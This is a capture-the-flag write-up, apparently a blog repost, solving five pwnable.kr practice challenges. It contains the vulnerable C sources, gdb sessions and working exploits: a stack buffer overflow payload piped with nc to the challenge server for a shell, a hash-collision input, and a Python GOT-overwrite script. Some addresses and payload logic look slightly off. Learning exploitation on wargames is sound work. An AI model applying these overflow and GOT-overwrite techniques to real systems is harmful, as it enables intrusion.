1.[fd]
fd@ubuntu:~$ cat fd.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char buf[32];
int main(int argc, char* argv[], char* envp[]){
if(argc<2){
printf("pass argv[1] a number\n");
return 0;
}
int fd = atoi( argv[1] ) - 0x1234; //convert argv[1] to hex
int len = 0;
len = read(fd, buf, 32); // Read 32 counts start with fd(=0) into buff.
if(!strcmp("LETMEWIN\n", buf)){ // if buf="LETMEWIN",good job!
printf("good job :)\n");
system("/bin/cat flag");
exit(0);
}
printf("learn about Linux file IO\n");
return 0;
}
---------------------------------------------------------------------------------------------------------------------------------------
Solution:
fd@ubuntu:~$ python -c 'print 0x1234'
4660
fd@ubuntu:~$ ./fd 4660
LETMEWIN
good job :)
mommy! I think I know what a file descriptor is!! //Got auth flag!
--------------------------------------------------------------------------------------------------------------------------------------
2.collision
col@ubuntu:~$ cat col.c
#include <stdio.h>
#include <string.h>
unsigned long hashcode = 0x21DD09EC;
unsigned long check_password(const char* p){
int* ip = (int*)p;
int i;
int res=0;
for(i=0; i<5; i++){
res += ip[i];
}
return res;
}
int main(int argc, char* argv[]){
if(argc<2){
printf("usage : %s [passcode]\n", argv[0]);
return 0;
}
if(strlen(argv[1]) != 20){ //The length of passcode is 20
printf("passcode length should be 20 bytes\n");
return 0;
}
if(hashcode == check_password( argv[1] )){ //If check_password(passcode) == hashcode,could pass.
system("/bin/cat flag");
return 0;
}
else
printf("wrong passcode.\n");
return 0;
}
---------------------------------------------------------------------------------------------------------------------------------------
Solution:
We could assume all hex values for first 16 charactors is '0x01',so every 4 charactors's hex value is "0x01010101"
So the hex value for the left is:0x21DD09EC - 0x01010101*4 = 0x1dd905e8
col@ubuntu:~$ python -c 'print hex(0x21DD09EC - 0x01010101*4)'
0x1dd905e8
We could create a input passcode like "\x01\x01\x01\x01"*4 + "\xe8\x05\xd9\x1d".
col@ubuntu:~$ ./col `python -c 'print "\x01\x01\x01\x01"*4 + "\xe8\x05\xd9\x1d"'`
daddy! I just managed to create a hash collision :) //get the flag
-----------------------------------------------------------------------------------------------------------------------------------------
3.bof
yuanjideMacBook-Air:yuanjizhao root# cat bof.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
char overflowme[32];
printf("overflow me : ");
gets(overflowme); // smash me!
if(key == 0xcafebabe){
system("/bin/sh");
}
else{
printf("Nah..\n");
}
}
int main(int argc, char* argv[]){
func(0xdeadbeef);
return 0;
}
---------------------------------------------------------------------------------------------------------------------------------------
Solution:
Download the program.
root@debian:~/pwnable# wget http://pwnable.kr/bin/bof
Use gdb to debug it.
root@debian:~/pwnable# gdb bof
gdb-peda$ start
gdb-peda$ disassemble func
Dump of assembler code for function func:
0x0040062c <+0>: push ebp
0x0040062d <+1>: mov ebp,esp
0x0040062f <+3>: sub esp,0x48
0x00400632 <+6>: mov eax,gs:0x14
0x00400638 <+12>: mov DWORD PTR [ebp-0xc],eax
0x0040063b <+15>: xor eax,eax
0x0040063d <+17>: mov DWORD PTR [esp],0x40078c
0x00400644 <+24>: call 0xb7e532c0 <__GI__IO_puts>
0x00400649 <+29>: lea eax,[ebp-0x2c]
0x0040064c <+32>: mov DWORD PTR [esp],eax
0x0040064f <+35>: call 0xb7e52a60 <_IO_gets>
=> 0x00400654 <+40>: cmp DWORD PTR [ebp+0x8],0xcafebabe //if $ebp+0x8=0xcafebabe,pass.
0x0040065b <+47>: jne 0x40066b <func+63>
0x0040065d <+49>: mov DWORD PTR [esp],0x40079b
0x00400664 <+56>: call 0xb7e28c00 <__libc_system>
0x00400669 <+61>: jmp 0x400677 <func+75>
0x0040066b <+63>: mov DWORD PTR [esp],0x4007a3
0x00400672 <+70>: call 0xb7e532c0 <__GI__IO_puts>
0x00400677 <+75>: mov eax,DWORD PTR [ebp-0xc]
0x0040067a <+78>: xor eax,DWORD PTR gs:0x14
0x00400681 <+85>: je 0x400688 <func+92>
0x00400683 <+87>: call 0xb7ef5080 <__stack_chk_fail>
0x00400688 <+92>: leave
0x00400689 <+93>: ret
End of assembler dump.
gdb-peda$ b * 0x00400654
Breakpoint 2 at 0x400654
gdb-peda$ def hook-stop
Type commands for definition of "hook-stop".
End with a line saying just "end".
>x/24wx $esp
>x/2i $eip
>x/wx $ebp+0x8
>end
gdb-peda$ r
Starting program: /root/pwnable/bof
overflow me :
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
0xbffffbf0: 0xbffffc0c 0xbffffcf4 0xb7fc4000 0x00000000
0xbffffc00: 0x00000000 0xb7fc4000 0xb7e1bcb9 0x41414141
0xbffffc10: 0x42424242 0x43434343 0x44444444 0x45454545
0xbffffc20: 0x46464646 0x47474747 0x48484848 0x49494949
0xbffffc30: 0x4a4a4a4a 0x4b4b4b4b 0x4c4c4c4c 0x4d4d4d4d
0xbffffc40: 0x4e4e4e4e 0x4f4f4f4f 0x50505050 0x51515151
=> 0x400654 <func+40>: cmp DWORD PTR [ebp+0x8],0xcafebabe
0x40065b <func+47>: jne 0x40066b <func+63>
0xbffffc40: 0x4e4e4e4e
Breakpoint 2, 0x00400654 in func ()
gdb-peda$ !
root@debian:~/pwnable# python -c 'print chr(0x4e)'
N //The value for the address 0xbffffc40 is "NNNN",change it to hex value 0xcafebabe,we'll get the exploit successfully. So,create a payload use python like the below.
root@debian:~/pwnable# python -c 'print "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMM"+"\xbe\xba\xfe\xca"' > attack.txt
Return to gdb session use "exit".
gdb-peda$ r < attack.txt
gdb-peda$ r < attack.txt
Starting program: /root/pwnable/bof < attack.txt
overflow me :
0xbffffbf0: 0xbffffc0c 0xbffffcf4 0xb7fc4000 0x00000000
0xbffffc00: 0x00000000 0xb7fc4000 0xb7e1bcb9 0x41414141
0xbffffc10: 0x42424242 0x43434343 0x44444444 0x45454545
0xbffffc20: 0x46464646 0x47474747 0x48484848 0x49494949
0xbffffc30: 0x4a4a4a4a 0x4b4b4b4b 0x4c4c4c4c 0x4d4d4d4d
0xbffffc40: 0xcafebabe 0x00000000 0x004006b9 0x00000000
=> 0x400654 <func+40>: cmp DWORD PTR [ebp+0x8],0xcafebabe
0x40065b <func+47>: jne 0x40066b <func+63>
0xbffffc40: 0xcafebabe
Breakpoint 2, 0x00400654 in func ()
gdb-peda$ c //exploit to /usr/bin/dash.
Continuing.
[Attaching after process 4430 fork to child process 4437]
[New inferior 2 (process 4437)]
[Detaching after fork from parent process 4430]
[Inferior 1 (process 4430) detached]
process 4437 is executing new program: /usr/bin/dash
[Attaching after process 4437 fork to child process 4441]
[New inferior 3 (process 4441)]
[Detaching after fork from parent process 4437]
[Inferior 2 (process 4437) detached]
process 4441 is executing new program: /usr/bin/dash
*** stack smashing detected ***: <unknown> terminated
[Inferior 3 (process 4441) exited normally]
Error while running hook_stop:
No registers.
gdb-peda$ quit
root@debian:~/pwnable# (cat attack.txt;cat) |nc pwnable.kr 9000 //Or use (python -c 'print "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMM"+"\xbe\xba\xfe\xca"';cat) | nc pwnable.kr 9000
id
uid=1008(bof) gid=1008(bof) groups=1008(bof)
ls
bof
bof.c
flag
log
log2
super.pl
cat flag
daddy, I just pwned a buFFer :) //the answer flag
--------------------------------------------------------------------------------------------------------------------------------------
4.flag
root@ubuntu:/# wget http://pwnable.kr/bin/flag
root@ubuntu:/# od -t x1z flag|more //use od command to check the file.
0000000 7f 45 4c 46 02 01 01 03 00 00 00 00 00 00 00 00 >.ELF............<
0000020 02 00 3e 00 01 00 00 00 f0 a4 44 00 00 00 00 00 >..>.......D.....<
0000040 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >@...............<
0000060 00 00 00 00 40 00 38 00 02 00 40 00 00 00 00 00 >....@.8...@.....<
0000100 01 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 >................<
0000120 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 >..@.......@.....<
0000140 04 ad 04 00 00 00 00 00 04 ad 04 00 00 00 00 00 >................<
0000160 00 00 20 00 00 00 00 00 01 00 00 00 06 00 00 00 >.. .............<
0000200 d8 62 0c 00 00 00 00 00 d8 62 6c 00 00 00 00 00 >.b.......bl.....<
0000220 d8 62 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 >.bl.............<
0000240 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 >.......... .....<
0000260 fc ac e0 a1 55 50 58 21 1c 08 0d 16 00 00 00 00 >....UPX!........< //include UPX info
0000300 21 7c 0d 00 21 7c 0d 00 90 01 00 00 92 00 00 00 >!|..!|..........<
0000320 08 00 00 00 f7 fb 93 ff 7f 45 4c 46 02 01 01 03 >.........ELF....<
0000340 00 02 00 3e 00 01 0e 58 10 40 1f df 2f ec db 40 >...>...X.@../..@<
0000360 2f 78 38 0c 45 26 38 00 06 0a 21 00 1f 6c 60 bf >/x8.E&8...!..l`.<
root@ubuntu:/# strings flag|more //use strings to check
UPX! //include UPX info
@/x8
gX lw_
H/\_@
Kl$
H9\$(t
[]]y
nIV,Uh
AWAVAUATS
uSL9
>t .
[A\AA;h
The binary has been packed by UPX packer,we should unpack it first.
root@ubuntu:/# file flag
flag.1: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
root@ubuntu:/# upx -d flag
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2017
UPX 3.94 Markus Oberhumer, Laszlo Molnar & John Reiser May 12th 2017
File size Ratio Format Name
-------------------- ------ ----------- -----------
883745 <- 335288 37.94% linux/amd64 flag
Unpacked 1 file.
root@ubuntu:/# file flag
flag: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=96ec4cc272aeb383bd9ed26c0d4ac0eb5db41b16, not stripped
--------------------------------------------------------------------------------------------------------------------------------------
Solution:
Use gdb to debug the binary
root@ubuntu:/# gdb flag
gdb-peda$ disassemble main
Dump of assembler code for function main:
0x0000000000401164 <+0>: push rbp
0x0000000000401165 <+1>: mov rbp,rsp
0x0000000000401168 <+4>: sub rsp,0x10
0x000000000040116c <+8>: mov edi,0x496658
0x0000000000401171 <+13>: call 0x402080 <puts>
0x0000000000401176 <+18>: mov edi,0x64
0x000000000040117b <+23>: call 0x4099d0 <malloc>
0x0000000000401180 <+28>: mov QWORD PTR [rbp-0x8],rax
0x0000000000401184 <+32>: mov rdx,QWORD PTR [rip+0x2c0ee5] # 0x6c2070 <flag> //the value of rip+0x2c0ee5 is flag.
0x000000000040118b <+39>: mov rax,QWORD PTR [rbp-0x8]
0x000000000040118f <+43>: mov rsi,rdx
0x0000000000401192 <+46>: mov rdi,rax
0x0000000000401195 <+49>: call 0x400320
0x000000000040119a <+54>: mov eax,0x0
0x000000000040119f <+59>: leave
0x00000000004011a0 <+60>: ret
End of assembler dump.
gdb-peda$ b * 0x000000000040118b
Breakpoint 2 at 0x40118b
gdb-peda$ r
gdb-peda$ x/wx $rip+0x2c0ee5
0x6c2070 <flag>: 0x00496628
gdb-peda$ x/s 0x00496628
0x496628: "UPX...? sounds like a delivery service :)" //Got the flag
--------------------------------------------------------------------------------------------------------------------------------------
5.passcode
passcode@prowl:~$ cat passcode.c
#include <stdio.h>
#include <stdlib.h>
void login(){
int passcode1;
int passcode2;
printf("enter passcode1 : ");
scanf("%d", passcode1);
fflush(stdin);
// ha! mommy told me that 32bit is vulnerable to bruteforcing :)
printf("enter passcode2 : ");
scanf("%d", passcode2);
printf("checking...\n");
if(passcode1==338150 && passcode2==13371337){
printf("Login OK!\n");
system("/bin/cat flag");
}
else{
printf("Login Failed!\n");
exit(0);
}
}
void welcome(){
char name[100];
printf("enter you name : ");
scanf("%100s", name);
printf("Welcome %s!\n", name);
}
int main(){
printf("Toddler's Secure Login System 1.0 beta.\n");
welcome();
login();
// something after login...
printf("Now I can safely trust you that you have credential :)\n");
return 0;
}
--------------------------------------------------------------------------------------------------------------------------------------
Solution:
References:
https://www.rootnetsec.com/pwnable.kr-passcode/
https://github.com/chrysh/ctf_writeups/tree/master/pwnable.kr/passcode
https://systemoverlord.com/2017/03/19/got-and-plt-for-pwning.html
In local machine.
1> Generate a exploit string use ragg2 tool to fullfill name buffer.
root@debian:~/pwnable# ragg2 -P 100 -r;echo
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh
In target machine.
2> Use gdb to debug the binary.
passcode@prowl:~$ gdb passcode
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
0x08048665 <+0>: push ebp
0x08048666 <+1>: mov ebp,esp
0x08048668 <+3>: and esp,0xfffffff0
0x0804866b <+6>: sub esp,0x10
0x0804866e <+9>: mov DWORD PTR [esp],0x80487f0
0x08048675 <+16>: call 0x8048450 <puts@plt>
0x0804867a <+21>: call 0x8048609 <welcome>
0x0804867f <+26>: call 0x8048564 <login>
0x08048684 <+31>: mov DWORD PTR [esp],0x8048818
0x0804868b <+38>: call 0x8048450 <puts@plt>
0x08048690 <+43>: mov eax,0x0
0x08048695 <+48>: leave
0x08048696 <+49>: ret
End of assembler dump.
(gdb) disassemble login
Dump of assembler code for function login:
0x08048564 <+0>: push ebp
0x08048565 <+1>: mov ebp,esp
0x08048567 <+3>: sub esp,0x28
0x0804856a <+6>: mov eax,0x8048770
0x0804856f <+11>: mov DWORD PTR [esp],eax
0x08048572 <+14>: call 0x8048420 <printf@plt>
0x08048577 <+19>: mov eax,0x8048783
0x0804857c <+24>: mov edx,DWORD PTR [ebp-0x10] // passcode1 = $ebp-0x10
0x0804857f <+27>: mov DWORD PTR [esp+0x4],edx
0x08048583 <+31>: mov DWORD PTR [esp],eax
0x08048586 <+34>: call 0x80484a0 <__isoc99_scanf@plt>
0x0804858b <+39>: mov eax,ds:0x804a02c
0x08048590 <+44>: mov DWORD PTR [esp],eax
0x08048593 <+47>: call 0x8048430 <fflush@plt> // The plt for fflush() function,it's not a real address for it.
0x08048598 <+52>: mov eax,0x8048786
0x0804859d <+57>: mov DWORD PTR [esp],eax
0x080485a0 <+60>: call 0x8048420 <printf@plt>
0x080485a5 <+65>: mov eax,0x8048783
0x080485aa <+70>: mov edx,DWORD PTR [ebp-0xc]
0x080485ad <+73>: mov DWORD PTR [esp+0x4],edx
0x080485b1 <+77>: mov DWORD PTR [esp],eax
0x080485b4 <+80>: call 0x80484a0 <__isoc99_scanf@plt>
0x080485b9 <+85>: mov DWORD PTR [esp],0x8048799
0x080485c0 <+92>: call 0x8048450 <puts@plt>
0x080485c5 <+97>: cmp DWORD PTR [ebp-0x10],0x528e6 // Condition Jump. passcode1 == 338150
0x080485cc <+104>: jne 0x80485f1 <login+141>
0x080485ce <+106>: cmp DWORD PTR [ebp-0xc],0xcc07c9 // Condition Jump. passcode2 == 13371337
0x080485d5 <+113>: jne 0x80485f1 <login+141>
0x080485d7 <+115>: mov DWORD PTR [esp],0x80487a5 //We could overwirte this address for system function calling later.if the stack fullfill to this address,the binary will be executed successfully.
0x080485de <+122>: call 0x8048450 <puts@plt> //0x080485de and 0x080485e3 we could overwrite too,they could call system function to execute system("/bin/cat flag").
0x080485e3 <+127>: mov DWORD PTR [esp],0x80487af
0x080485ea <+134>: call 0x8048460 <system@plt> // The plt for system() funtion.
0x080485ef <+139>: leave
0x080485f0 <+140>: ret
0x080485f1 <+141>: mov DWORD PTR [esp],0x80487bd
0x080485f8 <+148>: call 0x8048450 <puts@plt>
0x080485fd <+153>: mov DWORD PTR [esp],0x0
0x08048604 <+160>: call 0x8048480 <exit@plt>
End of assembler dump.
(gdb) b *0x0804857c // Create a breakpoint before scanf() function.
Breakpoint 1 at 0x804857c
(gdb) r
Starting program: /home/passcode/passcode
Toddler's Secure Login System 1.0 beta.
enter you name : AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh
Welcome AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh!
Breakpoint 1, 0x0804857c in login ()
(gdb) x/wx $ebp-0x10 // Display passcode1 variable's value in hex format.
0xffaceb18: 0x68414167
(gdb) x/s $ebp-0x10 // Display passcode's value in string format.
0xffaceb18: "gAAh" // passcode1 == $ebp-0x10 overwrited by 0x68414167 == "gAAh",so the max of name buffer's lenth is smaller than 100,it's only 96 as real. name == "AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAA"
(gdb) disassemble 0x8048430 //Check the plt data for fflush function.
Dump of assembler code for function fflush@plt:
0x08048430 <+0>: jmp DWORD PTR ds:0x804a004 //The real address for fflush function is 0x804a004.
0x08048436 <+6>: push 0x8
0x0804843b <+11>: jmp 0x8048410
End of assembler dump.
3> List the .plt and .got sections of the binary.
(gdb) !
passcode@prowl:~$
root@debian:~/pwnable# readelf -S passcode |egrep 'plt|got'
[10] .rel.plt REL 08048398 000398 000048 08 A 5 12 4
[12] .plt PROGBITS 08048410 000410 0000a0 04 AX 0 0 16
[22] .got PROGBITS 08049ff0 000ff0 000004 04 WA 0 0 4
[23] .got.plt PROGBITS 08049ff4 000ff4 000030 04 WA 0 0 4
passcode@prowl:~$ objdump -R passcode|egrep 'fflush|system'
0804a004 R_386_JUMP_SLOT fflush@GLIBC_2.0
0804a010 R_386_JUMP_SLOT system@GLIBC_2.0
Return to gdb
passcode@prowl:~$ exit
(gdb) x 0x0804a008
0x804a008 <__stack_chk_fail@got.plt>: 0x08048446
(gdb) x/4wx 0x0804a008
0x804a008 <__stack_chk_fail@got.plt>: 0x08048446 0x08048456 0x08048466 0x08048476
(gdb) x/10i 0x0804a008 //Check the data for address 0x0804a008
0x804a008 <__stack_chk_fail@got.plt>: inc esi
0x804a009 <__stack_chk_fail@got.plt+1>: test BYTE PTR [eax+ecx*1],al
0x804a00c <puts@got.plt>: push esi
0x804a00d <puts@got.plt+1>: test BYTE PTR [eax+ecx*1],al
0x804a010 <system@got.plt>: data16 test BYTE PTR [eax+ecx*1],al
0x804a014 <__gmon_start__@got.plt>: jbe 0x8049f9a
0x804a016 <__gmon_start__@got.plt+2>: add al,0x8
0x804a018 <exit@got.plt>: xchg BYTE PTR [esp+eax*1+0x57f54008],al
0x804a01f <__libc_start_main@got.plt+3>: mul DWORD PTR [esi+0x80484]
0x804a025: add BYTE PTR [eax],al
4> Create a payload for this binary.
Target:
Overwirte the fflush function before system function calling.
1. Fullfilling name buffer. //"A"*96
2. Find the address of fflush() funciton. //0x0804a004
3. Find location call of system() function. //0x080485ea
4. Overwrite fflush's address with available address. //After condition jump,before system calling,there have three adresses we could use.They are 0x080485d7,0x408085de,0x080485e3
Edit a python script like below.
passcode@prowl:~$ vi /tmp/passcode.py
import struct
import random
padding = "A"*96
eip = struct.pack("I",0x804a004) # Overwrite address 0x804a004 as overwrite fflush function.
payload = random.choice([str(0x080485d7),str(0x408085de),str(0x080485e3)])
print padding + eip + payload
passcode@prowl:~$ python /tmp/passcode.py |./passcode
Toddler's Secure Login System 1.0 beta.
enter you name : Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA� !
enter passcode1 : ����$�{������U�T$�$������$�� �����}��(
Sorry mom.. I got confused about scanf usage :(
Now I can safely trust you that you have credential :) //Got flag successfully.
--------------------------------------------------------------------------------------------------------------------------------------
转载于:https://www.cnblogs.com/heycomputer/articles/10963697.html